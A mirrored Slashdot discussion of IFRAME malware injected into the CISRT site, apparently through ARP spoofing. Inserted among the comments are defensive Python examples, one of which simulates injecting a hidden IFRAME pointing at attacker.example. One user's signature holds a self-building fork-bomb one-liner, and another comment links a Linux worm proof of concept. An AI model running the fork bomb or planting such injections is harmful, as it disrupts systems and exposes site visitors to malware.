Slashdot Mirror


Chinese Security Site Under New Kind of Attack

SkiifGeek writes "The main site for the Chinese Internet Security Response Team (CISRT) has been serving up infrequent attacks against site visitors through the use of an injected IFRAME tag that attempts to download and install numerous pieces of malicious software. While the source of the attack has yet to be identified, suspicion is that it might be an ARP attack being hosted by the CISRT's hosting provider. Rather than a straight-up infection attempt against all site visitors (as was the case with the Bank of India hack), it is an interesting evolution to see intermittent attack attempts against site visitors."

73 comments

  1. FTFA... by bangenge · · Score: 1, Insightful

    We are very sorry that when sometimes visiting our some pages, malicious codes are inserted. We think it doesn't mean that our website has been compromised. It's maybe due to ARP attack. We have informed our webserver provider to help us check whether it's due to ARP attack or not.

    Ummmm... I think if malicious code is inserted into your site, it's been compromised.

    --
    . o O ( TwO hEaDs ArE mOrE tHaN oNe... )
    1. Re:FTFA... by TheThiefMaster · · Score: 4, Informative

      Ummmm... I think if malicious code is inserted into your site, it's been compromised. Except it's not being inserted into the website itself, the page is being modified en-route to the client.
      Read up on ARP spoofing. The basic theory is that another machine at the same webhost is pretending to be the gateway to the internet, and so all traffic gets to flow through it and it can modify it as it wishes.
    2. Re:FTFA... by unsubscribe · · Score: 1

      If the ARP data is being falsified, visitors to the site could be directed to an alternate clone server, hosting pages with content the same as the original server but also including malicious code. If this is the case then the actual webserver has not been compromised, but users are still being exposed to the malicious code through the cloned server.

      For example:

      Say the webserver of the victim site has a public IP of (1.1.1.1), and a MAC address of (11:11:11:11:11:11). Its home page is (index.html).

      The victim site's ISP decides to perform an ARP attack. They set up a server which hosts a clone of the victim site. This server has a MAC address of (22:22:22:22:22:22). However, they modify (index.html) to include malicious code.

      The ISP sets up their managed switch so that instead of mapping (1.1.1.1) to (11:11:11:11:11:11), which would be correct, they map (1.1.1.1) to (22:22:22:22:22:22). Now, when users try to visit (1.1.1.1), they will visit the cloned server instead of the original server, and be exposed to the malicious code on the modified (index.html), even though the original server has not been compromised.
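
The IP-to-MAC remapping described in the post above is exactly what a passive ARP monitor watches for. The following Python is an added example, not code from the thread or from CISRT: it replays a constructed log of ARP replies (1.1.1.1 with 11:11:... and 22:22:... are the placeholder values from the post; the gateway 1.1.1.254 / aa:aa:... is invented) through a detector that flags an IP whose hardware address changes, a claimant contradicting a static binding (the `arp -s` style of defence), and one MAC answering for several IPs.

```python
"""Detect ARP spoofing from a stream of ARP replies. Added example.

Input is a list of ArpReply records as a passive monitor on the segment would
see them. All addresses below are constructed: 1.1.1.1 / 11:11:... and 22:22:...
are the placeholder values from the post, the gateway is invented.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Set


@dataclass(frozen=True)
class ArpReply:
    ts: float         # capture time, seconds
    sender_ip: str    # sender protocol address announced in the reply
    sender_mac: str   # sender hardware address announced in the reply


@dataclass(frozen=True)
class Alert:
    ts: float
    ip: str
    expected_mac: str
    seen_mac: str
    reason: str


def detect_arp_spoof(replies: Iterable[ArpReply],
                     static_bindings: Optional[Dict[str, str]] = None) -> List[Alert]:
    """Flag replies that contradict a static binding or remap an IP already seen.

    `static_bindings` plays the role of `arp -s` entries: a pinned IP never
    updates the learned table, and any other claimant is an alert.
    """
    static = {ip: mac.lower() for ip, mac in (static_bindings or {}).items()}
    learned: Dict[str, str] = {}
    alerts: List[Alert] = []
    for r in replies:
        mac = r.sender_mac.lower()
        if r.sender_ip in static:
            if static[r.sender_ip] != mac:
                alerts.append(Alert(r.ts, r.sender_ip, static[r.sender_ip], mac,
                                    "static binding violated"))
            continue
        prev = learned.get(r.sender_ip)
        if prev is not None and prev != mac:
            alerts.append(Alert(r.ts, r.sender_ip, prev, mac, "ip remapped"))
        learned[r.sender_ip] = mac   # last reply wins, as a trusting ARP cache does
    return alerts


def macs_claiming_multiple_ips(replies: Iterable[ArpReply]) -> Dict[str, Set[str]]:
    """One hardware address answering for several IPs is the classic MITM giveaway."""
    claims: Dict[str, Set[str]] = {}
    for r in replies:
        claims.setdefault(r.sender_mac.lower(), set()).add(r.sender_ip)
    return {mac: ips for mac, ips in claims.items() if len(ips) > 1}


# Constructed capture: server and gateway answer, then one host impersonates both.
SAMPLE_REPLIES = [
    ArpReply(0.0,  "1.1.1.254", "aa:aa:aa:aa:aa:aa"),  # real gateway (invented)
    ArpReply(1.0,  "1.1.1.1",   "11:11:11:11:11:11"),  # real web server
    ArpReply(30.0, "1.1.1.1",   "22:22:22:22:22:22"),  # attacker claims the server IP
    ArpReply(31.0, "1.1.1.254", "22:22:22:22:22:22"),  # attacker claims the gateway IP
    ArpReply(40.0, "1.1.1.1",   "11:11:11:11:11:11"),  # real server answers again: flapping
]
STATIC_BINDINGS = {"1.1.1.254": "aa:aa:aa:aa:aa:aa"}

if __name__ == "__main__":
    for a in detect_arp_spoof(SAMPLE_REPLIES, STATIC_BINDINGS):
        print(f"t={a.ts:5.1f} {a.ip:<10} {a.expected_mac} -> {a.seen_mac}  {a.reason}")
    print("MACs claiming several IPs:", macs_claiming_multiple_ips(SAMPLE_REPLIES))
```

The flapping between 11:11:... and 22:22:... at t=30 and t=40 is what makes the symptom intermittent from a visitor's point of view: whichever reply the gateway's cache absorbed last decides where the next request goes.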

    3. Re:FTFA... by MichaelSmith · · Score: 4, Interesting

      A port block on http would work just as well but serving only https would defeat all variants on this attack, assuming that the certificate is set up correctly.

      The CISRT should know better than to use http without SSL.

    4. Re:FTFA... by Bri3D · · Score: 1

      Have you ever tried using https exclusively on a production web server?
      Some people don't have infinite amounts of money to spend on the CPU to encrypt every byte of their homepage every time someone hits it...
      What's really needed is a signed HTTP solution that doesn't require full-stream encryption; if the user is submitting no data and the data being served is not secret, illegal, confidential, etc. there is no reason for full-stream encryption but a signature would prevent this sort of attack.
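
Bri3D's signed-HTTP idea can be sketched in a few lines. The following Python is an added example, not the poster's code or anything the page describes: the server attaches a signature over the body digest, the content type and a timestamp (the header names X-Body-Signature and X-Signed-Date are invented here), and a client that checks it rejects a page with an IFRAME injected in transit, as well as a stale replay of a validly signed page. HMAC-SHA256 stands in for the signature so the block runs with the standard library alone; a deployable version would use a public-key signature so the client only ever holds a verification key.

```python
"""Integrity-only signing of an HTTP response, as a sketch of 'signed HTTP'.

Added example. HMAC-SHA256 stands in for a real signature scheme (a deployed
design would use a public-key signature so clients hold no secret), and the
header names X-Body-Signature / X-Signed-Date are invented for the example.
"""
import hashlib
import hmac
import time
from typing import Dict, Optional

SIG_HEADER = "X-Body-Signature"   # hypothetical
DATE_HEADER = "X-Signed-Date"     # hypothetical


def _signing_input(date: str, content_type: str, body: bytes) -> bytes:
    # Bind the body digest to the headers a MITM would most want to change.
    digest = hashlib.sha256(body).hexdigest()
    return f"{date}\n{content_type}\n{digest}".encode()


def sign_response(key: bytes, body: bytes, content_type: str = "text/html",
                  now: Optional[float] = None) -> Dict[str, str]:
    """Server side: return the headers that accompany `body`."""
    date = str(int(time.time() if now is None else now))
    tag = hmac.new(key, _signing_input(date, content_type, body), hashlib.sha256).hexdigest()
    return {"Content-Type": content_type, DATE_HEADER: date, SIG_HEADER: tag}


def verify_response(key: bytes, headers: Dict[str, str], body: bytes,
                    now: Optional[float] = None, max_age: int = 300) -> bool:
    """Client side: True only if body and covered headers are untouched and fresh."""
    try:
        date = headers[DATE_HEADER]
        tag = headers[SIG_HEADER]
        content_type = headers["Content-Type"]
        issued = int(date)
    except (KeyError, ValueError):
        return False
    expected = hmac.new(key, _signing_input(date, content_type, body), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return False
    # Without a freshness window a MITM could replay an old, validly signed page.
    now = time.time() if now is None else now
    return 0 <= now - issued <= max_age


def inject_iframe(body: bytes) -> bytes:
    """Simulate the en-route modification: a hidden IFRAME just before </body>."""
    payload = b'<iframe src="http://attacker.example/x" width="0" height="0"></iframe>'
    return body.replace(b"</body>", payload + b"</body>", 1)


# Constructed sample: a static page, a shared key and a fixed clock (example values only).
KEY = b"example-signing-key-not-for-production"
PAGE = b"<html><head><title>CISRT</title></head><body><p>Advisories</p></body></html>"
T0 = 1_190_000_000

if __name__ == "__main__":
    hdrs = sign_response(KEY, PAGE, now=T0)
    print("genuine page verifies:   ", verify_response(KEY, hdrs, PAGE, now=T0 + 5))
    print("injected page verifies:  ", verify_response(KEY, hdrs, inject_iframe(PAGE), now=T0 + 5))
    print("hour-old replay verifies:", verify_response(KEY, hdrs, PAGE, now=T0 + 3600))
```

Nothing here is encrypted, which is the point of the proposal: the server pays one hash and one MAC per response instead of a per-connection handshake and stream cipher, and the client learns that the page was altered but not by whom.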

    5. Re:FTFA... by jthorpe · · Score: 1

      I'd say it's quite unlikely that this is an ARP spoof. In order for this to work, there would need to be other servers within the same layer 2 broadcast domain, meaning that the attacking server would have to be within the same VLAN. TFA provides nothing to support an ARP spoof as a probable cause.

    6. Re:FTFA... by rk075456 · · Score: 1

      Yes, absolutely right.

    7. Re:FTFA... by mcrbids · · Score: 1

      Except it's not being inserted into the website itself, the page is being modified en-route to the client.
      Read up on ARP spoofing...[SNIP]


      Which is why SSL should be more commonly used. Seriously - an SSL cert costs less than a hundred bux/year, or less than two hundred bux per year for one that allows wildcard subdomains and completely defeats this, and loads of other attacks. (No, I'm not affiliated with RapidSSL, but I am a happy customer)

      The nice thing about wildcard SSL is that it effectively allows you to host multiple sites under a single IP address and port. Simply use subdomains of your root domain, and use Apache's VirtualHost directive!

      Or, we could take it one step further and actually USE dnssec - but that might be asking a bit too much...

      This attack is old. Technology to prevent it is well known and mature. Why are we still doing this?

      --
      I have no problem with your religion until you decide it's reason to deprive others of the truth.
    8. Re:FTFA... by TT076750 · · Score: 1

      Yeah, I agree with you.

  2. Strange Choice of Target, eh? by darthflo · · Score: 4, Interesting

    Does anyone understand why such an attack would be launched targeting a security site with a userbase that probably won't be too vulnerable to an IE-specific well-known and detected exploit?
    If this really is an ARP-spoofing based attack all other sites in their provider's location ought to be vulnerable too and would make better targets, don't you think?

    By the way: what's the point in occasionally inserting the attack code (it will get detected sooner or later, no matter how often it's inserted, 100% of pageviews over 2 days would probably be better than 10% over a week)?

    1. Re:Strange Choice of Target, eh? by ultraparanoid · · Score: 0

      I would think that a retaliation aspect and/or demonstration purposes is the main factor. It does give a statement, doesn't it? "If we can hack the Chinese Internet Security Response Team server we can hack yours".

    2. Re:Strange Choice of Target, eh? by WindBourne · · Score: 2, Insightful

      Unless of course, the security site is doing it itself. I would not be surprised if they are trying to inject into clients. More importantly, I would guess that it would not attack systems that come from other known security sites.

      --
      I prefer the "u" in honour as it seems to be missing these days.
    3. Re:Strange Choice of Target, eh? by Geheimagent · · Score: 1

      By the way: what's the point in occasionally inserting the attack code (it will get detected sooner or later, no matter how often it's inserted, 100% of pageviews over 2 days would probably be better than 10% over a week)?
      It's supposed to be an ARP attack. Maybe they can't insert it into every connection.
    4. Re:Strange Choice of Target, eh? by darthflo · · Score: 1

      They probably can't insert it into every connection, but the gateway will extremely probably have an arp cache which would mean it's inserted into 100% of all requests as long as the gateway's cache is compromised and 0% of all requests for the periods inbetween. TFA doesn't exactly mention how often and when this happens, but I interpreted it as "into some requests all the time". I don't know the TTL an entry in the gateway's ARP cache will receive but imagine it to be in the order of a few hours rather than minutes.

    5. Re:Strange Choice of Target, eh? by Anonymous Coward · · Score: 0

      By the way: what's the point in occasionally inserting the attack code (it will get detected sooner or later, no matter how often it's inserted, 100% of pageviews over 2 days would probably be better than 10% over a week)?

      From the writeup:

      While the source of the attack has yet to be identified, suspicion is that it might be an ARP attack being hosted by the CISRT's hosting provider.

      Intermittent bugs are harder to debug than easy-to-duplicate bugs.

    6. Re:Strange Choice of Target, eh? by querist · · Score: 1

      Not a strange choice at all...

      If you read the site, people go to this site to post questions when they are having problems. It is not only a "security" site for those of us who are security practitioners, but it is also a forum where non-security people can ask questions or ask for help.

      Actually, it's a great target because one would think that a security site would be safe. And, due to the nature of this attack, there is not much that the site's operators could have done to prevent it (other than the obvious use SSL, which I still don't know why they didn't do that).

      So, in retrospect, it makes perfect sense. This is sort of why some criminals dress up as various "trusted" types of people - they play on that assumed trust.

    7. Re:Strange Choice of Target, eh? by rk076200 · · Score: 1

      I don't think it's an ARP attack. How can a secure site like this allow a silly attack directed at its site? Maybe it's a part of their strategy... who knows!!!

    8. Re:Strange Choice of Target, eh? by darthflo · · Score: 1

      Three possible reasons:

      A) They're renting webspace, not a dedicated box.
      B) The ISP's *gateway* gets the spoofed ARP replies, their content is being reverse proxied thru the attackers server (why not, it may after all be the weakest link)
      C) They didn't secure their box.

  3. Interesting? by Big+Nothing · · Score: 5, Funny

    "it is an interesting evolution"

    Yes, if by "interesting" you mean "annoying". And by "evolution" you mean "I wish all malware creators would curl up in a corner and die."

    --
    SIG: TAKE OFF EVERY 'CAPTAIN'!!
    1. Re:Interesting? by Anonymous Coward · · Score: 5, Funny

      Malware creators have feelings too.

      For example, they laugh when you are infected with malware.

    2. Re:Interesting? by someone1234 · · Score: 1

      And I will laugh when the Chinese police shoot them on the spot.

      --
      Patents Drive Free Software as Hurricanes Drive Construction Industry
    3. Re:Interesting? by Dr.+Cody · · Score: 1

      "it is an annoying I wish all malware creators would curl up in a corner and die."?

    4. Re:Interesting? by Hal_Porter · · Score: 1

      It's quite possible on this Chinese ISP the majority of users are spammers, scammers, malware writers and blackhats. And they probably all wish the Chinese Internet Security Response Team would stop posting spoilers about their hard work.

      --
      echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
  4. Ironic hackers? by ThirdPrize · · Score: 0, Redundant

    Getting the "Chinese Internet Security Response Team" website to deliver malware. Way to go.

    --
    I have excellent Karma and I am not afraid to Troll it.
  5. Re:CSIRT is dying by El+Lobo · · Score: 3, Funny

    IIS on a Windows 2003 server? That is one of the better and most secure combinations you can have today! Seriously, don't fool yourself. IIS 6 and 7 have a record of almost no critical exploits. In comparison with Apache it simply shines. And Windows 2003 is rock solid.

    --
    It's time to realise that Abble's products are the biggest abomination these days. Just say NO to the dumb iAbble way!!
  6. Re:CSIRT is dying by Yetihehe · · Score: 1

    Yeah. I still remember my first time installing 2003. After installation I downloaded all patches with autoupdate. The next day I ran IE for the first time and there was already some adware on it. So it is NOT secure.

    --
    Extreme Programming - Redundant Array of Inexpensive Developers
  7. How is this IFRAME attack new? by Anonymous Coward · · Score: 0

    It was one of the main reasons I argued against using them originally to clients 8 years ago.

    now, AJAX... hehehe

  8. Re:CSIRT is dying by Yetihehe · · Score: 1

    if you got some adware I'm sure you are the one to be blamed somehow
    But HOW? As I said, it was the first run of IE on a fresh install after automatic updates and leaving the computer overnight. On previous installations there was no adware at first, only after some time. So this was a test to check if it got there by itself. No one other than me had access to this computer. So Windows 2003 is TOTALLY not secure (by default). I don't say it's less or more secure than Apache+Linux, but I have yet to get a virus on my Slackware.
    --
    Extreme Programming - Redundant Array of Inexpensive Developers
  9. Common knowledge by packetmon · · Score: 3, Informative

    It shouldn't come as a shocker that attackers are trying to re-route traffic from legitimate sites to illegitimate ones. What's odd is, ARP spoofing can be curtailed by static ARP addressing and the network administrators of that netblock should be able to stop it outright or at minimum isolate the traffic. This is nothing more than a man in the middle attack and I've always wondered when someone was going to try it on a large scale... Guess I got my answer. Imagine this for a second though and the ramifications of it... Google, well known for huge amounts of servers dispersed throughout the world...

    Attacker on GoogleB farm's network --> man in the middle (for an hour a month) --> undetected --> redirect to malware cocktail site Visitors --> replicated Google --> view infected page

    Technically it's possible provided the MITM attacker is on the same network, the network engineers didn't mitigate against it, and someone is really determined.

    We've all (hopefully all of us) heard of the "Storm" botnet. It's not an exaggeration to think of someone getting their act together and creating something on this level of an attack vector. The question is _when_ will it happen. Who knows, for all you know Slashdot was loaded with a cocktail of malware when you visited this site. Hope people get a clue and keep their machines clean. There's no silver bullet solution when an attacker is 1) skillful enough 2) undetectable nowadays 3) has major motivation (finance).

  10. Oblig. car analogy. by TapeCutter · · Score: 1

    I drove my new car out of the sales yard without looking and got cleaned up by a truck, obviously it's the car's fault.

    --
    And did you exchange a walk on part in the war for a lead role in a cage? - Pink Floyd.
    1. Re:Oblig. car analogy. by Anonymous Coward · · Score: 0

      Wow, the first car analogy I've seen on Slashdot that makes sense.

  11. IIS != IE by mousse-man · · Score: 1

    The Internet Immolation Server has actually become more secure, with few, if any, bad security holes found in the last two years. However, this does not hinder the coder from developing secure software, and anything that plugs into IIS needs to be as secure as IIS.

    The Internet Exploder however - well, its reputation is well ahead of any statistics, as my de-wormed Windows boxen demonstrate.

  12. New? by DNS-and-BIND · · Score: 4, Informative
    No, this isn't new. I had it happen on my website while it was hosted in China. At the bottom of every page, there was an IFRAME pointing to an external site, automatically inserted just above the tag. I didn't find out about it because I used Opera, and of course I didn't get infected. I found out because my users were complaining that my front page set off their virus alarms. Silly me, I told them that my whole site was static HTML straight from Dreamweaver, and that there was no dynamic content that could be exploited. I assumed that my webserver was hacked (the Chinese ISP used IIS, of course) and told everyone there was nothing I could do. The problem "resolved itself" and then returned a few times.

    I've since moved to a Hong Kong server running BSD/Apache. Much cheaper, I get an actual control panel, and I'm not subject to the ridiculous requirements of the ICP permit. You know what you have to go through to get one of those for a business? Insane! And don't even mention that you're a foreigner, they go apeshit.

    --
    Shutting down free speech with violence isn't fighting fascism. It IS fascism!
    1. Re:New? by rk076200 · · Score: 1

      I think the Chinese can be more dangerous than anything on earth... ;)

    2. Re:New? by ColdWetDog · · Score: 1

      You hosted a website in China parodying the Communist Chinese government and you're complaining that they're bothering you with annoying paperwork? Unless I'm misreading the whole point of your site, either the government has finally developed some sense of humor or you're lucky to be alive.

      --
      Faster! Faster! Faster would be better!
    3. Re:New? by Bearhouse · · Score: 1

      As you've found out, it's a good idea to regularly check your pages, using many browsers (or - at least - the main ones like IE, Firefox...). Your host can screw things up for you - even simple things like breaking links, let alone stuff like this.

      There are 3rd parties that can do this for you also.

    4. Re:New? by Anonymous Coward · · Score: 0

      No, actually those really are what the posters say. Funny old world, eh?

    5. Re:New? by DNS-and-BIND · · Score: 1

      Who said the site in my profile was the site I was talking about? The poster's website is hosted in the USA, because that's where the customers are. The site I was talking about is for people in China, hence the hosting in China. Otherwise, there's no reason to host here; service is awful, expensive, and very very slow if you're outside the Great Firewall.

      --
      Shutting down free speech with violence isn't fighting fascism. It IS fascism!
  13. Re:CSIRT is dying by PopeRatzo · · Score: 1

    But HOW? As I said, it was the first run of IE on a fresh install after automatic updates and leaving the computer overnight.
    Maybe it came on the installation disk. It was Windows Server 2003, right?
    --
    You are welcome on my lawn.
  14. Re:CSIRT is dying by will_die · · Score: 3, Informative

    IIS 7 is actually rather nice. It is a complete rewrite from IIS 6, didn't they do that from IIS 5?
    They use Apache methods for uploading files, major fix over IIS6.
    The security is modular and supports security similar to what Apache does.
    And the configuration files are now text files which you edit with your text editor. Wasn't that the main selling point with the IIS pros saying IIS was better because you did not have to use some text file where you had to go in and manually edit?

  15. Re:CSIRT is dying by El+Lobo · · Score: 1

    It is. IIS7 is configured via the usual GUI. The settings are STORED in text files, though, and not in the registry as it was in older versions (to comply with .NET apps). But an administrator should not feel the difference.

    --
    It's time to realise that Abble's products are the biggest abomination these days. Just say NO to the dumb iAbble way!!
  16. Re:CSIRT is dying by nilbud · · Score: 0

    In what way are you "proud" to use microsoft products? Where does pride play a part in being a consumer, are you proud to use toilet paper or watch TV?

    --
    never let a man put his dirty how-do-you-do into your bajingo
  17. Re:Common knowledge...firefox? by hesaigo999ca · · Score: 1

    What about running a nix box using Firefox, would you still have the problem of acquiring these malwares on your PC??? If this is not the case, then what about the same thing but inside a VMware install??? Would it not curtail the threat while browsing the internet?

  18. Re:Common knowledge...firefox? by packetmon · · Score: 1
    Depends... I did a proof of concept for Linux:

    http://www.infiltrated.net/scripts/dsphunxion.sh

    http://www.infiltrated.net/scripts/dsphunxion.output

    The concept was a pseudo heuristic worm to be downloaded via a vuln on a Linux box. Caveats... Surfer would have to be root... Could be re-written to exploit something else to gain root though. Someone with modsecurity skills could do a re-write based on header information and redirect Linux boxes to their appropriate pages to download and exploit it though. Again, it's theory and concept based.

  19. Disable dl() in PHP by Anonymous Coward · · Score: 0

    This is a common exploit -- use dl() to dynamically load a .so into PHP which allows arbitrary insertion of strings into returned webpages -- allows one to set a header/footer to be returned in any future pages served by that process. Search the internet for "flame.so"

  20. Re:CSIRT is dying by Anonymous Coward · · Score: 0

    are you proud to use toilet paper or watch TV?

    Better to be proud to use toilet paper than being proud not to.

  21. SLASHDOT PEOPLE ARE A PACK OF LAME FOOLS by Anonymous Coward · · Score: 0

    You people modded someone down for posting facts from a respected site for security on all platforms that you cannot dispute, which is quite lame. Shame on you losers here at Slashdot is about all a body can state. I will add on SQL Server 2005 as well (another Microsoft product bearing 0 unpatched flaws which is often used in combination with IIS & Windows Server 2k3):

    SQLServer 2005 @ SECUNIA:

    http://secunia.com/product/6782/

    Affected By 0 Secunia advisories
    Unpatched 0% (0 of 0 Secunia advisories)

  22. Re:CSIRT is dying by Anonymous Coward · · Score: 0

    Starting with SP1, Windows 2003 Server now installs in an "everything off" mode, accepting no inbound connections. You are prompted to click a button to download and install the latest security updates, and prompted to configure automatic updates. That dialog also has the button to exit lockdown mode.

    Of course, if you're doing remote installs, you can configure lockdown mode to keep remote desktop enabled, but if you're doing remote installs you should have slipstreamed in the latest patches instead of just slipstreaming in SP1...

  23. ARP Attacks by madsheep · · Score: 1

    ARP attacks against websites like this are relatively uncommon but fairly easy to do. ISC (isc.sans.org) did a write-up not too long ago where someone's customer was attacked like this. Due to a lack of switch security and clients not using static ARP tables etc. this attack will succeed pretty frequently when hosts are on the same subnet/VLAN. I'm not sure the CSIRT website gets too much traffic to begin with, definitely more after being slashdotted. I don't think saying that their user-base doesn't use IE or is fully patched is accurate. Besides, from an attacker's point of view: who cares. It's hit or miss... and nothing happens when they miss. On top of that, who says they aren't ARP spoofing this into every host and webserver on the network there? CSIRT might just be 1 of 100. Btw the first exe is pulled from the domain mentioned which then pulls a second file (100.exe) from another domain. It appears to be a password stealer. What a sad bunch of people doing all this crap.

  24. shame, but it's a lie by Anonymous Coward · · Score: 1, Informative

    I know another site that got EXACTLY this problem (iframes in the code, linking to malware); this was because of a worm exploiting vulnerabilities in PHP scripts. I wouldn't be surprised if they got hax0red and tried to say "hey it's ARP poisoning, another server got owned, not us!" What a shaaaame, they got pwn3d, that's it, you can be sure.

  25. Thank You Slashdot by Anonymous Coward · · Score: 0

    for linking to a page that may try to download trojans to my computer.

  26. Re:Common knowledge...firefox? by DrSkwid · · Score: 1

    You know you've lost when you can't trust your OS to run user apps and you think the VM will save you.

    --
    There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
  27. Re:CSIRT is dying by DrSkwid · · Score: 1

    "Completely re-written" doesn't often preface "therefore more secure".

    --
    There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
  28. is it possible by arjun21 · · Score: 1

    I think maybe this is a part of CISRT's trick to spread viruses. As a result more site visitors will look to them for help. And maybe the Chinese government didn't pay salaries for the employees at CISRT, and they use this attack to take revenge.

  29. Re:Injected by rk075245 · · Score: 1

    I think this attack is caused by a programming error. The program is not secure; non-malicious problems. The programming flaw involves synchronization. The time-of-check to time-of-use (TOCTTOU) flaw concerns mediation that is performed with a "bait and switch" in the middle.

  30. Re:CSIRT is dying by mycall · · Score: 1

    Unless you do a UDP spoof onto a service that isn't patched.

  31. nice tag by BMojo · · Score: 1

    Nice tag guys: thatswhatyagetforalltheleadpaint. *Someone* is a little bitter over recent Chinese cyber attacks, not naming countries or anything.

    --
    -BMojo

  32. Chinaons.com by mattr · · Score: 2, Interesting

    I just noticed a day ago that a lot of html files I had stored on a usb hdd (my ipod) had had a line introduced, an iframe going to chinaons.com with some garble after it that might be Chinese. It was really disconcerting. Not just because of the line which was easily removed, but because Virus Buster would DELETE the files.

    I would really like to be able to make certain folders on my ipod read-only password protected when I plug it in, so I know this isn't happening.
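
DNS-and-BIND's post above and mattr's report here describe the same artefact: an IFRAME pointing off-site, appended near the end of otherwise static HTML. The following Python is an added example, not code from either poster: it parses HTML with the standard library and reports IFRAMEs whose src host is not the site's own, or that are sized or styled to be invisible, and it can be pointed at files on disk for the stored-pages case. The sample pages and the host names (www.example.org, malware.example) are constructed for the example.

```python
"""Report IFRAMEs that look injected: off-site source or sized/styled invisible.

Added example using only the standard library. Sample pages and host names
(www.example.org, malware.example) are constructed for the example.
"""
import sys
from html.parser import HTMLParser
from typing import Dict, Iterable, Iterator, List, Tuple
from urllib.parse import urlsplit


class _IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag."""

    def __init__(self) -> None:
        super().__init__()
        self.iframes: List[Dict[str, str]] = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})

    handle_startendtag = handle_starttag  # also catch the <iframe ... /> form


def _is_zero(value: str) -> bool:
    v = value.strip().lower().removesuffix("px").strip()
    return v.isdigit() and int(v) == 0


def _is_hidden(attrs: Dict[str, str]) -> bool:
    style = attrs.get("style", "").replace(" ", "").lower()
    return (_is_zero(attrs.get("width", "")) or _is_zero(attrs.get("height", ""))
            or "display:none" in style or "visibility:hidden" in style)


def find_injected_iframes(html: str, site_host: str) -> List[Dict[str, object]]:
    """Return one finding per suspicious IFRAME in `html`.

    A relative or same-host src is treated as legitimate unless the frame is
    hidden; anything pointing at another host is reported either way.
    """
    parser = _IframeCollector()
    parser.feed(html)
    parser.close()
    findings: List[Dict[str, object]] = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = urlsplit(src).hostname or site_host.lower()   # relative src -> own site
        off_site = host != site_host.lower()
        hidden = _is_hidden(attrs)
        if off_site or hidden:
            findings.append({"src": src, "host": host, "off_site": off_site, "hidden": hidden})
    return findings


def scan_files(paths: Iterable[str], site_host: str) -> Iterator[Tuple[str, Dict[str, object]]]:
    """The on-disk case: yield (path, finding) for every suspicious frame in each file."""
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as f:
            for finding in find_injected_iframes(f.read(), site_host):
                yield path, finding


# Constructed pages. The infected one carries the payload just before </body>.
CLEAN_PAGE = """<html><body><h1>Static site</h1>
<iframe src="/embed/stats.html" width="300" height="150"></iframe>
</body></html>"""
INFECTED_PAGE = """<html><body><h1>Static site</h1>
<iframe src="/embed/stats.html" width="300" height="150"></iframe>
<iframe src="http://malware.example/in.html" width="0" height="0"></iframe></body></html>"""

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("usage: scan.py SITE_HOST FILE...")
        sys.exit(2)
    for path, finding in scan_files(sys.argv[2:], sys.argv[1]):
        print(path, finding)
```

Running it across a site's own files, as Bearhouse suggests doing with several browsers, catches the stored variant mattr saw; for the en-route variant in TFA the same function has to be run on what a client actually received, since the files on the server are clean.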

  33. Re:CSIRT is dying by flonker · · Score: 1

    Only a very few settings were stored in the registry. Most of the settings are in the metabase. Don't ask, you really don't want to know. It is like the registry, only even more obscure to edit, and more prone to severe breakage.

  34. Re:Common knowledge...firefox? by hesaigo999ca · · Score: 1

    My point was still just using the snapshot ability to overwrite the previous OS install after maybe 2 days. Seeing as a snapshot takes about 15 minutes to restore, you could do a snapshot after the full install+upgrades etc.... then use that as your base for a malware free OS, and after 2 days usage, whether you have malware or not, refresh the OS so to speak.

    I know this philosophy of using VMware may not be the original intent for its deployment, but short of creating your own OS to be 100% certain that no malware can be installed, even Linux can apparently get owned, so it's not the OS, it's the usage of apps that makes it insecure.

    We can't stop using our apps, so it will be up to something like vmware (for now) to help us, no?

  35. Re:Common knowledge...firefox? by hesaigo999ca · · Score: 1

    My hat's off to you, if you were the one to write this code. Got to say, I know when I am in the presence of greatness... again, if you were the one to write the code.

    My compliments on the actual proof of concept though, beautiful!

    Care to elaborate on what your stem would be for accomplishing further steps, as the person accessing the page may not really have root? Would there be a way to own the machine regardless of root access, maybe using a redirect to a process that does have root, say calling from Firefox's known vulnerabilities???

  36. Re:Common knowledge...firefox? by DrSkwid · · Score: 1

    Even Linux! Say it ain't so.

    Eventually your malware will overwrite your snapshots or the binary that restores them.

    That said, the OS I use has daily snapshots (or as often as you like) to a central server (thus enabling coalescing of data blocks i.e. repeated blocks of data are stored only once). The choice of which snapshot to use is per process, so, for instance, you can compile yesterday's code in one window and last weeks in another and see what changed. Or boot any terminal into last month's state of any other etc. etc.

    --
    There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
  37. Re:Common knowledge...firefox? by hesaigo999ca · · Score: 1

    Unless someone was smart enough to have burned that ISO of the snapshot on a DVD before any malware got to it, so as to have a proper image each time... and I know someone who was a god in Linux that taught me what to place on the CD-ROM to avoid recompiles, so that certain directories could not be written to, therefore not rootkitted...

    "And they told me i couldn't play 7/8, I just did 2 bars of 3/4 and a 1"

  38. Re:Common knowledge...firefox? by DrSkwid · · Score: 1

    Plan 9 taught me that if your terminal needs backing up, you have already lost.
    Boot diskless and you don't need to image your disks and hope for the best because all of your terminals are just that, terminals. Storage belongs somewhere safe. These days cheap high speed networking should be making disks redundant in a LAN situation. The place is a damn sight quieter and consumes less energy.

    There's a lot of places a 500Mhz EPIA fanless will do just fine.

    --
    There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter